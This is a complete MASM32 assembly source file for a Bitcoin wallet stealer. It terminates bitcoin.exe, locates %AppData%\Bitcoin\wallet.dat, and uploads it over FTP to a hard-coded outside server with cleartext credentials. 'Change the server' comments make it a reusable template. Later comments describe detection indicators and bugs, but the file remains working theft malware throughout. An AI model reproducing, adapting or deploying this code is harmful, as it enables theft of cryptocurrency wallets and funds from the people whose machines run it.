include \masm32\include\masm32rt.inc
include \masm32\include\wininet.inc
includelib \masm32\lib\wininet.lib
; Forward declarations for the procedures defined in .code below (32-bit stdcall).
FTPit PROTO :DWORD,:DWORD,:DWORD ;(server name, local file path, remote file name)
KillMe PROTO :DWORD ;(process image name to terminate)
Randomize PROTO ;seeds random_seed from GetTickCount
Random PROTO :DWORD ;(upper bound) -> eax in [0, bound)
ThePort equ 21 ;TCP port handed to InternetConnect in FTPit (INTERNET_SERVICE_FTP)
.data
; Hard-coded exfiltration target and credentials. For a defender these three strings
; are the static indicators of this sample: a network-level indicator (the host) and
; the cleartext FTP login that goes over the wire on ThePort.
ftpsite db "poutube.uni.me",0 ;change the server
Username db "zosi",0 ;change the username
Password db "g0dl1ke",0 ;change the password
; Image name compared case-insensitively against every running process in KillMe.
szTheVictim db "bitcoin.exe",0
; Remote file name pattern: "<decimal number>-wallet.dat" (see start, Random result).
RandWallet db "%s-wallet.dat",0
; Environment variable name queried via GetEnvironmentVariable (no leading/trailing %).
AppData db "AppData",0
; Local path pattern; the directory is %AppData%\Bitcoin -- file access to this path
; by an unexpected process is the host-level indicator to watch for.
wallet db "%s\Bitcoin\wallet.dat",0
random_seed dd ? ;LCG state shared by Randomize / Random
res dd 0 ;last value returned by Random
sFmt db '%u',0 ;wsprintf format for res
sBuf db 10 dup(0) ;decimal text of res (max 7 digits + NUL for bound 9999999)
.data?
buffer db MAX_PATH dup(?) ;%AppData% value
WalletPath db 256 dup(?) ;full local wallet path
WalletFTP db 256 dup(?) ;remote file name
szBuffer db 256 dup(?) ;not referenced in this listing
.code
;-----------------------------------------------------------------------
; Entry point. Behaviour as written: terminate the wallet process, build a
; randomised remote file name, locate %AppData%\Bitcoin\wallet.dat and upload
; it over FTP, then exit. None of the call results are inspected, so every
; step runs regardless of whether the previous one succeeded.
;-----------------------------------------------------------------------
start:
invoke KillMe, addr szTheVictim ;kill the bitcoin process
invoke Randomize ;generate a random number
invoke Random,9999999 ;eax = value in [0, 9999999)
mov res,EAX
invoke wsprintf,ADDR sBuf,ADDR sFmt,res ;append it to our ftp upload filename
invoke wsprintf,addr WalletFTP,addr RandWallet, addr sBuf ;ex: 9586293-wallet.dat
invoke GetEnvironmentVariable, addr AppData, addr buffer, sizeof buffer ;get the %AppDATA% folder (sizeof buffer = MAX_PATH)
invoke wsprintf,addr WalletPath,addr wallet, addr buffer ;append the bitcoin wallet
invoke FTPit, addr ftpsite, addr WalletPath,addr WalletFTP ;upload WalletPath as WalletFTP to ftpsite
invoke ExitProcess, 0
;-----------------------------------------------------------------------
; FTPit(FTPserver, lpszFile, lpRemoteFile)
; Opens a WinINet session, logs in to FTPserver:ThePort with the static
; Username/Password (passive mode), uploads lpszFile as lpRemoteFile in
; binary mode, and closes both handles. No return value is checked: a
; NULL hInternet or ftpHandle is passed straight into the next call.
; Network footprint: one outbound TCP connection to ThePort plus the
; passive data connection, credentials sent in clear text.
;-----------------------------------------------------------------------
FTPit PROC FTPserver:DWORD, lpszFile:DWORD, lpRemoteFile:DWORD
local hInternet:DWORD
local ftpHandle:DWORD
local context:DWORD ;its address is passed as dwContext (the value itself is never set)
local InternetStatusCallback:DWORD ;declared but never used
invoke InternetOpen,NULL,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0 ;NULL user agent, system proxy settings
mov hInternet, eax
invoke InternetConnect,hInternet,FTPserver,ThePort ,\ ;if different port change INTERNET_DEFAULT_FTP_PORT to port #
ADDR Username,ADDR Password,INTERNET_SERVICE_FTP,\
INTERNET_FLAG_PASSIVE,ADDR context
mov ftpHandle,eax
invoke FtpPutFile,ftpHandle,lpszFile,lpRemoteFile,FTP_TRANSFER_TYPE_BINARY,NULL
invoke InternetCloseHandle,ftpHandle
invoke InternetCloseHandle, hInternet
ret
; Dead code: nothing jumps to err, and the ret above ends the only path.
err:
invoke GetErrDescription,eax
ret
FTPit endp
;-----------------------------------------------------------------------
; Random(dwBase) -> eax in [0, dwBase)
; Advances random_seed with a linear congruential step (multiplier
; 08088405h, increment 1 -- the same constants as the Borland/Delphi
; Random routine) and scales the new seed into range by taking the high
; dword of dwBase * seed. Clobbers edx and flags; ebx is saved/restored
; but never actually used.
;-----------------------------------------------------------------------
Random proc dwBase:dword
push ebx
mov eax,dwBase
xor ebx,ebx ;dead write: ebx is not read before pop
imul edx,random_seed,08088405h ;edx = seed * 08088405h (low 32 bits)
inc edx ;edx = seed * 08088405h + 1
mov random_seed,edx ;persist the new seed
mul edx ;edx:eax = dwBase * new seed
mov eax,edx ;eax = high dword = (dwBase * seed) >> 32, i.e. < dwBase
pop ebx
ret
Random endp
;-----------------------------------------------------------------------
; Randomize()
; Seeds random_seed from the millisecond uptime counter. Not a secure
; source of randomness; here it only varies the remote file name.
; Clobbers eax (GetTickCount return) and flags.
;-----------------------------------------------------------------------
Randomize proc
invoke GetTickCount
mov random_seed,eax
ret
Randomize endp
;-----------------------------------------------------------------------
; KillMe(szFile)
; Walks the process list via a Toolhelp snapshot and terminates every
; process whose image name equals szFile (case-insensitive compare).
; Observable behaviour for detection: CreateToolhelp32Snapshot followed
; by OpenProcess(PROCESS_TERMINATE) + TerminateProcess on the matching
; process. The OpenProcess handle is never closed, and esi (callee-saved
; under the Win32 ABI) is overwritten without being preserved; the result
; of Process32First is also not checked before the loop starts.
;-----------------------------------------------------------------------
KillMe proc szFile:dword
LOCAL Process:PROCESSENTRY32
mov Process.dwSize, sizeof Process ;required by Process32First/Next
invoke CreateToolhelp32Snapshot, 2, 0 ;2 = TH32CS_SNAPPROCESS, all processes
mov esi, eax ;esi = snapshot handle (caller's esi is clobbered)
invoke Process32First, esi, addr Process
@@loop:
invoke lstrcmpiA,szFile, addr Process.szExeFile
test eax, eax ;0 => names equal
jnz @@continue
invoke OpenProcess, 0001h, 0, Process.th32ProcessID ;0001h = PROCESS_TERMINATE, not inheritable
invoke TerminateProcess, eax, 0 ;handle from OpenProcess is leaked afterwards
@@continue:
invoke Process32Next, esi, addr Process
test eax, eax ;FALSE => no more entries (or error)
jz @@done
jmp @@loop
@@done:
invoke CloseHandle, esi
ret
KillMe endp
end start
û
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